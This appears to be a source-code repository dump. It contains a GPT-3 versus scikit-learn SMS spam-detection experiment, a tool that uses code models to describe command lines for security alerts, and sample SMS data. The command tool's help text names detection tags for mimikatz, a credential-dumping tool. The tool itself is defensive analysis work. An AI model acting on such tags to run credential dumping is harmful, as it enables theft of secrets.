df_test.shape:{}".format( 343 | path_test_data, df_test.shape)) 344 | 345 | QUERY_TEMPLATE = "\n{data_type}: {text}\nLabel:" 346 | y_test, y_pred = [], [] 347 | count_correct = 0 348 | for ix, row in df_test.iterrows(): 349 | text = row[column_text] 350 | label = row[column_label] 351 | logger.info("{}.text:{}".format(ix, text)) 352 | query_text = QUERY_TEMPLATE.format(data_type=data_type, text=text) 353 | prompt = context_prompt + query_text 354 | completion = get_openai_completion(prompt, model_name=model_name) 355 | if completion is not None: 356 | y_test.append(label == positive_label) 357 | y_pred.append(completion == positive_label) 358 | count_correct += 1 if label == completion else 0 359 | if sleep_time > 0: 360 | time.sleep(sleep_time) 361 | logger.info("label:{}, completion:{}, count_correct:{}".format( 362 | label, completion, count_correct)) 363 | 364 | return classification_report(y_test, y_pred, output_dict=True) 365 | -------------------------------------------------------------------------------- /spam_detector/spam_detector.py: -------------------------------------------------------------------------------- 1 | import os 2 | import logging 3 | import argparse 4 | import glob 5 | import numpy as np 6 | import pandas as pd 7 | import shutil 8 | from matplotlib import pyplot 9 | 10 | from sklearn_models import evaluate_sklearn_model 11 | from gpt3_models import evaluate_gpt3_model, classify_message 12 | 13 | 14 | logging.basicConfig(format="%(asctime)s %(message)s", 15 | datefmt="%Y-%m-%d %H:%M:%S", level=logging.INFO) 16 | logger = logging.getLogger(__name__) 17 | 18 | 19 | MAX_TEXT_DATA_LEN = 200 20 | MAX_SKLEARN_ML_FEATURES = 1000 21 | 22 | 23 | def generate_datasets( 24 | path_output_folder="spam_data", 25 | path_input_tsv_file="spam_data/SMSSpamCollection", 26 | column_text="text", 27 | column_label="label", 28 | positive_label="Spam", 29 | train_sample_size_list=[1024, 512, 32, 8, 2], 30 | test_sample_size=256, 31 | 
max_text_data_len=MAX_TEXT_DATA_LEN 32 | ): 33 | """ 34 | generate train and test datasets from path_input_tsv_file. 35 | :param path_output_folder: output folder 36 | :param path_input_tsv_file: input data file 37 | :param column_text: column for text data 38 | :param column_label: column for label data 39 | :param positive_label: label value for positive samples 40 | :param train_sample_size_list: a list of training sample sizes 41 | :param test_sample_size: test sample size 42 | :param max_text_data_len: max text length for pre-processing 43 | """ 44 | # load the input tsv file 45 | df = pd.read_csv(path_input_tsv_file, header=None, 46 | sep="\t", names=[column_label, column_text]) 47 | 48 | # pre-process the label and text columns. 49 | df["label"] = df["label"].apply(lambda x: x.capitalize()) 50 | df["text"] = df["text"].apply(lambda x: x[:max_text_data_len]) 51 | logger.info("{}, df.shape:{}".format(path_input_tsv_file, df.shape)) 52 | logger.info("df['label'].value_counts:{}".format( 53 | df["label"].value_counts())) 54 | 55 | # shuffle the df and split it into train and test datasets. 
56 | df = df.sample(frac=1, replace=False) 57 | df_test, df_train = df[:test_sample_size], df[test_sample_size:] 58 | logger.info("df_test.shape:{}".format(df_test.shape)) 59 | logger.info("df_test['label'].value_counts:{}".format( 60 | df_test["label"].value_counts())) 61 | 62 | logger.info("df_train.shape:{}".format(df_train.shape)) 63 | logger.info("df_train['label'].value_counts:{}".format( 64 | df_train["label"].value_counts())) 65 | 66 | path_output = os.path.join(path_output_folder, "train.csv") 67 | df_train.to_csv(path_output, sep="\t", index=False) 68 | 69 | path_output = os.path.join(path_output_folder, "test.csv") 70 | df_test.to_csv(path_output, sep="\t", index=False) 71 | 72 | is_positive = df_train["label"] == positive_label 73 | df_train_positive = df_train[is_positive] 74 | df_train_negative = df_train[~is_positive] 75 | 76 | # generate training datasets 77 | for train_sample_size in train_sample_size_list: 78 | positive_sample_size = negative_sample_size = train_sample_size//2 79 | df_train_positive = df_train_positive.sample( 80 | positive_sample_size, replace=False) 81 | df_train_negative = df_train_negative.sample( 82 | negative_sample_size, replace=False) 83 | # create a balanced dataset both from positive and negative samples 84 | df_train_all = pd.concat( 85 | [df_train_positive, df_train_negative]).sample(frac=1, replace=False) 86 | 87 | path_output = os.path.join( 88 | path_output_folder, "train_{}.csv".format(train_sample_size)) 89 | df_train_all.to_csv(path_output, sep="\t", index=False) 90 | logger.info("{}, df_train_all.shape:{}".format( 91 | path_output, df_train_all.shape)) 92 | logger.info("df_train_all['label'].value_counts:{}".format( 93 | df_train_all["label"].value_counts())) 94 | 95 | 96 | def evaluate_model_with_train_sample_sizes( 97 | path_results_output, 98 | model_name="RandomForest", 99 | path_data_folder="spam_data", 100 | train_sample_size_list=[2, 8, 32, 512, 1024], 101 | data_type="Message", 102 | column_text="text", 
103 | column_label="label", 104 | positive_label="Spam", 105 | negative_label="Ham", 106 | fine_tune=True, 107 | fine_tuned_model="", 108 | fine_tune_context_sample_size=4, 109 | prompt_context_sample_size=3, 110 | sleep_time=1 111 | ): 112 | """ 113 | evaluate an ML model with train sample sizes. 114 | :param path_results_output: path for outputs 115 | :param model_name: model name 116 | :param path_data_folder: path for data 117 | :param train_sample_size_list: a list of train sample sizes 118 | :param data_type: data type 119 | :param column_text: the column for text data 120 | :param column_label: the column for label data 121 | :param positive_label: the positive label value 122 | :param negative_label: the negative label value 123 | :param fine_tune: True to fine-tune 124 | :param fine_tuned_model: fine-tuned model name 125 | :param fine_tune_context_sample_size: the sample size for fine-tuning prompt data 126 | :param prompt_context_sample_size: the sample size for context prompt 127 | :param sleep_time: sleep time in seconds 128 | """ 129 | logger.info("evaluate_model_with_train_sample_sizes:{}".format(locals())) 130 | 131 | f1_score_list = [] 132 | for train_sample_size in train_sample_size_list: 133 | if train_sample_size > 0: 134 | path_train_data = os.path.join( 135 | path_data_folder, "train_{}.csv".format(train_sample_size)) 136 | else: 137 | path_train_data = os.path.join(path_data_folder, "train.csv") 138 | path_test_data = os.path.join(path_data_folder, "test.csv") 139 | 140 | if model_name in ["RandomForest", "LogisticRegression"]: 141 | report_test = evaluate_sklearn_model( 142 | path_train_data=path_train_data, 143 | path_test_data=path_test_data, 144 | model_name=model_name, 145 | max_features=MAX_SKLEARN_ML_FEATURES, 146 | column_text=column_text, 147 | column_label=column_label, 148 | positive_label=positive_label 149 | ) 150 | else: 151 | report_test = evaluate_gpt3_model( 152 | path_train_data, 153 | path_test_data=path_test_data, 154 | 
model_name=model_name, 155 | data_type=data_type, 156 | column_text=column_text, 157 | column_label=column_label, 158 | positive_label=positive_label, 159 | negative_label=negative_label, 160 | fine_tune=fine_tune, 161 | fine_tuned_model=fine_tuned_model, 162 | fine_tune_context_sample_size=fine_tune_context_sample_size, 163 | prompt_context_sample_size=prompt_context_sample_size, 164 | sleep_time=sleep_time 165 | ) 166 | 167 | if report_test is not None: 168 | test_f1_score = report_test["weighted avg"]["f1-score"] 169 | report_item = {"train_size": train_sample_size} 170 | report_item.update( 171 | {"test_"+k: v for k, v in report_test["weighted avg"].items()}) 172 | f1_score_list.append(report_item) 173 | 174 | logger.info("model_name:{}, train_size:{}, test_f1_score:{}".format( 175 | model_name, train_sample_size, test_f1_score)) 176 | 177 | #store the f1 scores 178 | df = pd.DataFrame(f1_score_list) 179 | df.to_csv(path_results_output, index=False) 180 | 181 | 182 | def plot_f1_results( 183 | plot_item_list=[("RandomForest", "orange", "o" ,"../**/results_randomforest.csv")], 184 | path_output="result_f1_plot.pdf" 185 | ): 186 | """ 187 | plot f1 results. 
188 | :param plot_item_list: a list of plot data items 189 | :param path_output: file path for output image 190 | """ 191 | pyplot.clf() 192 | 193 | for label, color, marker, path_pattern in plot_item_list: 194 | f1_list=[] 195 | for path_file in glob.glob(path_pattern, recursive=1): 196 | df = pd.read_csv(path_file) 197 | f1_list.append(df["test_f1-score"]) 198 | if len(f1_list) == 0: 199 | continue 200 | x = [str(size) for size in df["train_size"]] 201 | 202 | f1_list = np.array(f1_list) 203 | #the mean f1 values 204 | f1_mean = np.mean(f1_list, axis=0) 205 | #the std f1 values 206 | f1_std = np.std(f1_list, axis=0) 207 | f1_upper = f1_mean + f1_std 208 | f1_lower = f1_mean - f1_std 209 | 210 | pyplot.plot(x, f1_mean, marker=marker, color=color, label=label) 211 | pyplot.fill_between(x, f1_lower, f1_upper, color=color, alpha=.2) 212 | 213 | pyplot.grid() 214 | pyplot.ylabel("F1-score") 215 | pyplot.xlabel("Training sample size") 216 | pyplot.legend(loc="lower right") 217 | pyplot.savefig(path_output) 218 | 219 | 220 | def run_experiments(path_data_folder="spam_data"): 221 | """ 222 | run experiments with data sets in the data folder. 223 | :param path_data_folder: folder for the data sets 224 | """ 225 | # generate train and test datasets. 226 | generate_datasets( 227 | path_output_folder=path_data_folder, 228 | path_input_tsv_file=os.path.join( 229 | path_data_folder, "SMSSpamCollection"), 230 | column_text="text", 231 | column_label="label", 232 | positive_label="Spam", 233 | #the sample size list for training datasets should be sorted in descending order. 
234 | train_sample_size_list=[1024, 512, 32, 8, 2], 235 | test_sample_size=256 236 | ) 237 | 238 | # evaluate RandomForest model 239 | path_results_randomforest = os.path.join( 240 | path_data_folder, "results_randomforest.csv") 241 | evaluate_model_with_train_sample_sizes( 242 | path_results_output=path_results_randomforest, 243 | model_name="RandomForest", 244 | path_data_folder=path_data_folder, 245 | #the sample size list for evaluation should be sorted in ascending order. 246 | train_sample_size_list=[2, 8, 32, 512, 1024] 247 | ) 248 | 249 | # evaluate LogisticRegression model 250 | path_results_logisticregression = os.path.join( 251 | path_data_folder, "results_logisticregression.csv") 252 | evaluate_model_with_train_sample_sizes( 253 | path_results_output=path_results_logisticregression, 254 | model_name="LogisticRegression", 255 | path_data_folder=path_data_folder, 256 | train_sample_size_list=[2, 8, 32, 512, 1024] 257 | ) 258 | 259 | # evaluate GPT-3 few-shot model with few samples of [2, 8, 32] 260 | path_results_gpt3_fewshot = os.path.join( 261 | path_data_folder, "results_gpt3_fewshot.csv") 262 | evaluate_model_with_train_sample_sizes( 263 | path_results_output=path_results_gpt3_fewshot, 264 | model_name="text-davinci-002", 265 | path_data_folder=path_data_folder, 266 | train_sample_size_list=[2, 8, 32], 267 | fine_tune=False 268 | ) 269 | 270 | # # evaluate GPT-3 fine-tuning model with a few samples of [512, 1024] 271 | path_results_gpt3_finetune = os.path.join( 272 | path_data_folder, "results_gpt3_finetune.csv") 273 | evaluate_model_with_train_sample_sizes( 274 | path_results_output=path_results_gpt3_finetune, 275 | model_name="davinci", 276 | path_data_folder=path_data_folder, 277 | train_sample_size_list=[512, 1024], 278 | fine_tune=True 279 | ) 280 | 281 | #plot f1 results 282 | plot_items = [ 283 | #(label, color, mark, path_pattern) 284 | ("GPT3_Fewshot", "blue", "*", path_results_gpt3_fewshot), 285 | ("GPT3_Finetune", "red", "*", 
path_results_gpt3_finetune), 286 | ("RandomForest", "orange", "o", path_results_randomforest), 287 | ("LogisticRegression", "green", "v", path_results_logisticregression) 288 | ] 289 | plot_f1_results(plot_items, path_output=os.path.join(path_data_folder, "results_f1_plot.pdf")) 290 | 291 | 292 | if __name__ == "__main__": 293 | parser = argparse.ArgumentParser(description="Spam detection") 294 | parser.add_argument( 295 | "--run_type", 296 | help="classify_message or evaluate_approaches", 297 | default="classify_message" 298 | ) 299 | parser.add_argument( 300 | "--message", 301 | help="message to be classified", 302 | default="" 303 | ) 304 | parser.add_argument( 305 | "--path_train_data", 306 | help="file path for training samples", 307 | default="spam_data/experiment_1/train_2.csv" 308 | ) 309 | 310 | parser.add_argument( 311 | "--path_data_folder", 312 | help="file folder for data", 313 | default="spam_data" 314 | ) 315 | parser.add_argument( 316 | "--num_experiments", 317 | type=int, 318 | help="number of experiments", 319 | default=5 320 | ) 321 | args = parser.parse_args() 322 | 323 | if args.run_type == "classify_message": 324 | classify_message( 325 | message=args.message, 326 | path_train_data=args.path_train_data 327 | ) 328 | else: 329 | #run experiments 330 | for ix in range(1, args.num_experiments+1): 331 | path_data_folder = os.path.join(args.path_data_folder, "experiment_{}".format(ix)) 332 | logger.info("==== experiment_{}, path_data_folder:{}".format(ix, path_data_folder)) 333 | os.makedirs(path_data_folder, exist_ok=True) 334 | path_src_data = os.path.join(args.path_data_folder, "SMSSpamCollection") 335 | path_dest_data = os.path.join(path_data_folder, "SMSSpamCollection") 336 | shutil.copyfile(path_src_data, path_dest_data) 337 | run_experiments(path_data_folder=path_data_folder) 338 | 339 | #plot mean f1 with all experiment results. 
340 | plot_items = [ 341 | #(label, color, marker, path_pattern) 342 | ("GPT3_Fewshot", "blue", "*", os.path.join(args.path_data_folder, "**", "results_gpt3_fewshot.csv")), 343 | ("GPT3_Finetune", "red", "*", os.path.join(args.path_data_folder, "**", "results_gpt3_finetune.csv")), 344 | ("RandomForest", "orange", "o", os.path.join(args.path_data_folder, "**", "results_randomforest.csv")), 345 | ("LogisticRegression", "green", "v", os.path.join(args.path_data_folder, "**", "results_logisticregression.csv")) 346 | ] 347 | plot_f1_results(plot_items, path_output=os.path.join(args.path_data_folder, "results_mean_f1_plot.pdf")) 348 | -------------------------------------------------------------------------------- /command_analyzer/command_analyzer.py: -------------------------------------------------------------------------------- 1 | import json 2 | import pandas as pd 3 | import argparse 4 | import logging 5 | 6 | from prompt_data import get_prompt_for_desc_from_cmd_tag 7 | from prompt_data import get_prompt_for_cmd_from_tag_desc 8 | from prompt_data import get_prompt_for_combined_desc 9 | from prompt_data import preprocess_tags_str 10 | from prompt_data import generate_text_list_with_prompt 11 | from similarity import get_sorted_similarity_score_list 12 | from similarity import get_ngrams_bleu_similarity_score 13 | from similarity import get_semantic_similarity_score 14 | 15 | 16 | logging.basicConfig(format="%(asctime)s %(message)s", 17 | datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO) 18 | logger = logging.getLogger(__name__) 19 | 20 | 21 | MAX_CMD_LEN = 200 22 | 23 | ENGINE_CMD2DESC = "code-davinci-002" 24 | ENGINE_DESC2CMD = "code-davinci-002" 25 | ENGINE_COMBINE_DESC = "text-davinci-002" 26 | ENGINE_EMBEDDINGS = "text-similarity-babbage-001" 27 | 28 | ENGINE_TEMPERATURE = 0.7 29 | 30 | 31 | def generate_desc_list_from_cmd_tag( 32 | cmd, 33 | tags, 34 | include_tag=True, 35 | include_prefix=False, 36 | engine=ENGINE_CMD2DESC, 37 | temperature=0.7, 38 | n=5, 39 | 
max_cmd_len=MAX_CMD_LEN 40 | ): 41 | """ 42 | generates a list of descriptions from the command and tag info. 43 | :param cmd: command line data 44 | :param tags: "," separated tags data 45 | :param include_tag: True to include tags in prompt 46 | :param include_prefix: True to include support examples in prompt 47 | :param engine: openai engine 48 | :param temperature: temperature to control randomness of engine 49 | :param n: number of engine outputs 50 | :param max_cmd_len: max data length for command line data 51 | """ 52 | prompt = get_prompt_for_desc_from_cmd_tag( 53 | cmd, tags, max_cmd_len=max_cmd_len, 54 | include_tag=include_tag, include_prefix=include_prefix) 55 | desc_list = generate_text_list_with_prompt( 56 | prompt, engine=engine, temperature=temperature, n=n) 57 | return desc_list 58 | 59 | 60 | def generate_cmd_list_from_tag_desc( 61 | cmd, 62 | tags, 63 | desc, 64 | include_tag=True, 65 | include_prefix=False, 66 | engine=ENGINE_DESC2CMD, 67 | temperature=0.7, 68 | n=1, 69 | max_cmd_len=MAX_CMD_LEN 70 | ): 71 | """ 72 | generates a list of command lines from the description and tag info. 
73 | :param cmd: command line data 74 | :param tags: "," separated tags data 75 | :param desc: description for the command line 76 | :param include_tag: True to include tags in prompt 77 | :param include_prefix: True to include support examples in prompt 78 | :param engine: openai engine 79 | :param temperature: temperature to control randomness of engine 80 | :param n: number of engine outputs 81 | :param max_cmd_len: max data length for command line data 82 | """ 83 | first_token_as_cmd = cmd.split()[0] 84 | prompt = get_prompt_for_cmd_from_tag_desc( 85 | tags, desc, first_token_as_cmd, max_cmd_len=max_cmd_len, 86 | include_tag=include_tag, include_prefix=include_prefix) 87 | cmd_list = generate_text_list_with_prompt( 88 | prompt, engine=engine, temperature=temperature, n=n) 89 | return cmd_list 90 | 91 | 92 | def generate_combined_desc_from_cmd_desc( 93 | cmd, 94 | desc1, 95 | desc2, 96 | engine=ENGINE_COMBINE_DESC, 97 | temperature=0.7, 98 | max_cmd_len=MAX_CMD_LEN 99 | ): 100 | """ 101 | generates a combined description from two descriptions. 
102 | :param cmd: command line data 103 | :param desc1: the first description 104 | :param desc2: the second description 105 | :param engine: openai engine 106 | :param temperature: temperature to control randomness of engine 107 | :param max_cmd_len: max data length for command line data 108 | """ 109 | prompt = get_prompt_for_combined_desc( 110 | cmd, desc1, desc2, max_cmd_len=max_cmd_len) 111 | desc = generate_text_list_with_prompt( 112 | prompt, engine=engine, temperature=temperature, n=1)[0] 113 | return desc 114 | 115 | 116 | def generate_sorted_desc_list_from_cmd_tag( 117 | cmd, 118 | tags, 119 | include_tag=True, 120 | include_prefix=False, 121 | weight_desc_score=.0, 122 | weight_tags_score=.0, 123 | desc_size=5, 124 | cmd_size=1, 125 | engine_cmd2desc=ENGINE_CMD2DESC, 126 | engine_desc2cmd=ENGINE_DESC2CMD, 127 | engine_embeddings=ENGINE_EMBEDDINGS, 128 | temperature=ENGINE_TEMPERATURE, 129 | max_cmd_len=MAX_CMD_LEN 130 | ): 131 | """ 132 | generates a list of descriptions sorted by similarity scores. 133 | step1. generate a list of descs from cmd and tags 134 | step2. generate a list of cmds from tags and desc 135 | step3. 
sort descs by similarity scores 136 | 137 | :param cmd: command line data 138 | :param tags: "," separated tags data 139 | :param include_tag: True to include tags in prompt 140 | :param include_prefix: True to include support examples in prompt 141 | :param weight_desc_score: the weight for description score 142 | :param weight_tags_score: the weight for tags score 143 | :param desc_size: the number of output descriptions 144 | :param cmd_size: the number of output command lines 145 | :param engine_cmd2desc: the engine for command to description 146 | :param engine_desc2cmd: the engine for description to command 147 | :param engine_embeddings: the engine for text embeddings 148 | :param temperature: temperature to control randomness of engine 149 | :param max_cmd_len: max data length for command line data 150 | """ 151 | tags = preprocess_tags_str(tags) 152 | logger.info(f"tags={tags}") 153 | 154 | desc_list = generate_desc_list_from_cmd_tag( 155 | cmd, tags, include_tag=include_tag, include_prefix=include_prefix, 156 | engine=engine_cmd2desc, temperature=temperature, 157 | n=desc_size, max_cmd_len=max_cmd_len) 158 | if len(desc_list) == 0: 159 | return [], "" # callers unpack (desc_cmd_list, baseline_description) 160 | baseline_description = desc_list[0] 161 | 162 | cmd_first_token = cmd.split()[0] 163 | desc_cmd_list = [] 164 | for desc in desc_list: 165 | generated_cmd = generate_cmd_list_from_tag_desc( 166 | cmd, tags, desc, include_tag=include_tag, 167 | include_prefix=include_prefix, n=cmd_size, 168 | engine=engine_desc2cmd, temperature=temperature, 169 | max_cmd_len=max_cmd_len)[0] 170 | #append the cmd_first_token + the first generated text 171 | generated_cmd = cmd_first_token + generated_cmd 172 | desc_cmd_list.append((desc, generated_cmd)) 173 | desc_cmd_list = get_sorted_similarity_score_list( 174 | cmd, tags, 175 | desc_cmd_list, engine=engine_embeddings, 176 | weight_desc_score=weight_desc_score, 177 | weight_tags_score=weight_tags_score, max_cmd_len=max_cmd_len) 178 | return desc_cmd_list, 
baseline_description 179 | 180 | 181 | def generate_descriptions_from_cmd_tags( 182 | cmd, 183 | tags=None, 184 | n=2, 185 | combine_descriptions=True, 186 | engine_cmd2desc=ENGINE_CMD2DESC, 187 | engine_desc2cmd=ENGINE_DESC2CMD, 188 | engine_embeddings=ENGINE_EMBEDDINGS, 189 | engine_combine_desc=ENGINE_COMBINE_DESC, 190 | temperature=ENGINE_TEMPERATURE, 191 | max_cmd_len=MAX_CMD_LEN 192 | ): 193 | """ 194 | generates a combined description from a list of descriptions. 195 | :param cmd: command line data 196 | :param tags: "," separated tags data 197 | :param n: the number of output descriptions 198 | :param combine_descriptions: True to combine two descriptions 199 | :param engine_cmd2desc: the engine for command to description 200 | :param engine_desc2cmd: the engine for description to command 201 | :param engine_embeddings: the engine for text embeddings 202 | :param temperature: temperature to control randomness of engine 203 | :param max_cmd_len: max data length for command line data 204 | """ 205 | logger.info("generate_descriptions_from_cmd_tags:{}".format(locals())) 206 | 207 | if tags: 208 | include_tag = 1 209 | weight_desc_score=0.3 210 | weight_tags_score=0.2 211 | else: 212 | include_tag = 0 213 | weight_desc_score=0.5 214 | weight_tags_score=0.0 215 | 216 | desc_cmd_items, baseline_description = generate_sorted_desc_list_from_cmd_tag( 217 | cmd, tags, include_tag=include_tag, include_prefix=1, 218 | weight_desc_score=weight_desc_score, weight_tags_score=weight_tags_score, 219 | desc_size=5, cmd_size=1, 220 | engine_cmd2desc=engine_cmd2desc, engine_desc2cmd=engine_desc2cmd, 221 | engine_embeddings=engine_embeddings, temperature=temperature, 222 | max_cmd_len=max_cmd_len) 223 | 224 | baseline_description = "The command" + baseline_description 225 | 226 | best_candidates = [] 227 | first_desc, second_desc = '', '' 228 | for ix,item in enumerate(desc_cmd_items[:n]): 229 | score, _score_code, _score_desc, _score_tags, cmd, generated_cmd, desc = item[:] 
230 | candidate_data = {"score":score, "desc":desc, "generated_cmd":generated_cmd} 231 | if ix == 0: 232 | first_desc = desc 233 | else: 234 | second_desc = desc 235 | logger.info(candidate_data) 236 | best_candidates.append(candidate_data) 237 | 238 | if first_desc and second_desc: 239 | if combine_descriptions: 240 | combined_desc = generate_combined_desc_from_cmd_desc( 241 | cmd, first_desc, second_desc, 242 | engine=engine_combine_desc, temperature=temperature, 243 | max_cmd_len=max_cmd_len) 244 | description = "The command" + combined_desc 245 | else: 246 | description = "The command" + first_desc 247 | else: 248 | description = "The command" + first_desc 249 | logger.info("\n"+description+"\n") 250 | 251 | return description, baseline_description, best_candidates 252 | 253 | 254 | def generate_description( 255 | cmd, 256 | tags=None, 257 | combine_descriptions=True, 258 | engine_cmd2desc=ENGINE_CMD2DESC, 259 | engine_desc2cmd=ENGINE_DESC2CMD, 260 | temperature=ENGINE_TEMPERATURE 261 | ): 262 | """ 263 | generates a description from a command line and tag info. 
264 | :param cmd: command line data 265 | :param tags: "," separated tags data 266 | :param combine_descriptions: True to combine two descriptions 267 | :param engine_cmd2desc: the engine for command to description 268 | :param engine_desc2cmd: the engine for description to command 269 | :param temperature: temperature to control randomness of engine 270 | """ 271 | description, baseline_description, best_candidates = generate_descriptions_from_cmd_tags( 272 | cmd, tags=tags, n=2, 273 | combine_descriptions=combine_descriptions, 274 | engine_cmd2desc=engine_cmd2desc, engine_desc2cmd=engine_desc2cmd, 275 | temperature=temperature 276 | ) 277 | 278 | logger.info("cmd:\n{}".format(cmd)) 279 | logger.info("tags:\n{}".format(tags)) 280 | logger.info("description:\n{}".format(description)) 281 | logger.info("baseline_description:\n{}".format(baseline_description)) 282 | logger.info("back-translated_cmd:\n{}".format(best_candidates[0]["generated_cmd"])) 283 | return description, baseline_description, best_candidates 284 | 285 | 286 | def evaluate_approaches( 287 | path_output_json, 288 | path_input_json, 289 | engine_cmd2desc=ENGINE_CMD2DESC, 290 | engine_desc2cmd=ENGINE_DESC2CMD, 291 | temperature=ENGINE_TEMPERATURE, 292 | combine_descriptions=True, 293 | offset=0, 294 | limit=0 295 | ): 296 | """ 297 | evaluates baseline and back-translation approaches using a test dataset. 
298 | :param path_output_json: file path for output data 299 | :param path_input_json: file path for input data 300 | :param cmd: command line data 301 | :param tags: "," separated tags data 302 | :param engine_cmd2desc: the engine for command to description 303 | :param engine_desc2cmd: the engine for description to command 304 | :param temperature: temperature to control randomness of engine 305 | :param combine_descriptions: True to combine two descriptions 306 | :param offset: the offset of input data for partial testing 307 | :param limit: the limit of input data for partial testing 308 | """ 309 | logger.info("evaluate_approaches:{}".format(locals())) 310 | 311 | with open(path_input_json) as fr: 312 | items = json.load(fr) 313 | 314 | if offset>0: 315 | items = items[offset:] 316 | if limit>0: 317 | items = items[:limit] 318 | logger.info("number of items in input file:{}".format(len(items))) 319 | 320 | results = [] 321 | for ix, item in enumerate(items): 322 | logger.info("======== {}".format(ix)) 323 | 324 | cmd = item["cmd"] 325 | tags = item["tags"] 326 | gold_description = item["gold_reference_description"] 327 | 328 | generated_description, baseline_description, _best_candidates = generate_description( 329 | cmd, 330 | tags=tags, 331 | combine_descriptions=combine_descriptions, 332 | engine_cmd2desc=engine_cmd2desc, 333 | engine_desc2cmd=engine_desc2cmd, 334 | temperature=temperature 335 | ) 336 | 337 | item["generated_description"] = generated_description 338 | item["baseline_description"] = baseline_description 339 | 340 | candidate_list = [generated_description, baseline_description] 341 | 342 | ngram_bleu_scores = get_ngrams_bleu_similarity_score(gold_description, candidate_list) 343 | #ngram_bleu_scores_list.append(ngram_bleu_scores) 344 | item["ngram_bleu_scores"] = { 345 | "generated_description_score":ngram_bleu_scores[0], "baseline_description_score":ngram_bleu_scores[1] 346 | } 347 | 348 | semantic_similarity_scores = 
get_semantic_similarity_score(gold_description, candidate_list, engine=ENGINE_EMBEDDINGS) 349 | #semantic_similarity_scores_list.append(semantic_similarity_scores) 350 | item["semantic_similarity_scores"] = { 351 | "generated_description_score":semantic_similarity_scores[0], "baseline_description_score":semantic_similarity_scores[1] 352 | } 353 | 354 | results.append(item) 355 | 356 | logger.info("cmd:{}".format(cmd)) 357 | logger.info("tags:{}".format(tags)) 358 | logger.info("gold_description:{}".format(gold_description)) 359 | logger.info("generated_description:{}".format(generated_description)) 360 | logger.info("baseline_description:{}".format(baseline_description)) 361 | 362 | logger.info("ngram_bleu_scores:{}".format(ngram_bleu_scores)) 363 | logger.info("semantic_similarity_scores:{}".format(semantic_similarity_scores)) 364 | 365 | #save the outputs 366 | with open(path_output_json, "wt") as fw: 367 | json.dump(results, fw, indent=2) 368 | 369 | #store the mean and std values for similarity scores 370 | df_bleu = pd.DataFrame([item["ngram_bleu_scores"] for item in results]).add_prefix("ngram_bleu_") 371 | df_semantic = pd.DataFrame([item["semantic_similarity_scores"] for item in results]).add_prefix("semantic_similarity_") 372 | df = df_bleu.join(df_semantic) 373 | df_mean_std = df.agg(["mean", "std"]) 374 | logger.info("df_mean_std:{}".format(df_mean_std)) 375 | path_output_score_csv = path_output_json + "_scores.csv" 376 | df_mean_std.to_csv(path_output_score_csv) 377 | 378 | return results 379 | 380 | 381 | if __name__ == "__main__": 382 | parser = argparse.ArgumentParser(description="Command to description") 383 | 384 | parser.add_argument( 385 | "--run_type", 386 | help="generate_desc or evaluate_approaches", 387 | default="generate_desc" 388 | ) 389 | parser.add_argument( 390 | "--cmd", 391 | help="command line data", 392 | ) 393 | parser.add_argument( 394 | "--tags", 395 | help="',' seperated tags for example, 
win_mimikatz_command_line,win_suspicious_execution_path ", 396 | default="" 397 | ) 398 | parser.add_argument( 399 | "--combine_descriptions", 400 | action="store_true", 401 | dest="combine_descriptions", 402 | help="to combine two descriptions as the final description", 403 | default=True 404 | ) 405 | parser.add_argument( 406 | "--no_combine_descriptions", 407 | action="store_false", 408 | dest="combine_descriptions", 409 | help="not to combine two descriptions as the final description", 410 | default=False 411 | ) 412 | 413 | parser.add_argument( 414 | "--engine_cmd2desc", 415 | help="gpt3 model for command to description", 416 | default=ENGINE_CMD2DESC 417 | ) 418 | parser.add_argument( 419 | "--engine_desc2cmd", 420 | help="gpt3 model for description to command", 421 | default=ENGINE_DESC2CMD 422 | ) 423 | parser.add_argument( 424 | "--temperature", 425 | type=float, 426 | help="temperature to control randomness of engine", 427 | default=ENGINE_TEMPERATURE 428 | ) 429 | 430 | parser.add_argument( 431 | "--path_output_json", 432 | help="path for output json file", 433 | ) 434 | parser.add_argument( 435 | "--path_input_json", 436 | help="path for input json file", 437 | ) 438 | parser.add_argument( 439 | "--offset", 440 | type=int, 441 | help="the offset of input data for partial testing", 442 | default=0 443 | ) 444 | parser.add_argument( 445 | "--limit", 446 | type=int, 447 | help="the limit of input data for partial testing", 448 | default=0 449 | ) 450 | 451 | args = parser.parse_args() 452 | if args.run_type == "generate_desc": 453 | generate_description( 454 | args.cmd, 455 | args.tags, 456 | args.combine_descriptions, 457 | engine_cmd2desc=args.engine_cmd2desc, 458 | engine_desc2cmd=args.engine_desc2cmd, temperature=args.temperature 459 | ) 460 | else: 461 | evaluate_approaches( 462 | args.path_output_json, 463 | args.path_input_json, 464 | engine_cmd2desc=args.engine_cmd2desc, 465 | engine_desc2cmd=args.engine_desc2cmd, 466 | temperature=args.temperature, 467 | combine_descriptions=args.combine_descriptions, 468 | offset=args.offset, 469 | 
limit=args.limit 470 | ) 471 | -------------------------------------------------------------------------------- /spam_detector/spam_data/experiment_1/test.csv: -------------------------------------------------------------------------------- 1 | label text 2 | Ham LMAO where's your fish memory when I need it? 3 | Ham Got meh... When? 4 | Ham You should change your fb to jaykwon thuglyfe falconerf 5 | Ham Not sure yet, still trying to get a hold of him 6 | Ham Chk in ur belovd ms dict 7 | Ham Aight I'll grab something to eat too, text me when you're back at mu 8 | Ham Give me a sec to think think about it 9 | Ham Maybe you should find something else to do instead??? 10 | Ham She.s good. She was wondering if you wont say hi but she.s smiling now. So how are you coping with the long distance 11 | Ham I am thinking of going down to reg for pract lessons.. Flung my advance.. Haha wat time u going? 12 | Ham What Today-sunday..sunday is holiday..so no work.. 13 | Ham Fuck babe, I miss you sooooo much !! I wish you were here to sleep with me ... My bed is so lonely ... I go now, to sleep ... To dream of you, my love ... 14 | Spam Free entry in 2 a wkly comp to win FA Cup final tkts 21st May 2005. Text FA to 87121 to receive entry question(std txt rate)T&C's apply 08452810075over18's 15 | Ham Kay... Since we are out already 16 | Ham hows my favourite person today? r u workin hard? couldn't sleep again last nite nearly rang u at 4.30 17 | Ham Yeh. Indians was nice. Tho it did kane me off a bit he he. We shud go out 4 a drink sometime soon. Mite hav 2 go 2 da works 4 a laugh soon. Love Pete x x 18 | Ham I want <#> rs da:)do you have it? 19 | Ham No, but you told me you were going, before you got drunk! 20 | Ham It's cool, let me know before it kicks off around <#> , I'll be out and about all day 21 | Ham When you just put in the + sign, choose my number and the pin will show. Right? 22 | Ham Lol u still feeling sick? 23 | Spam 22 days to kick off! 
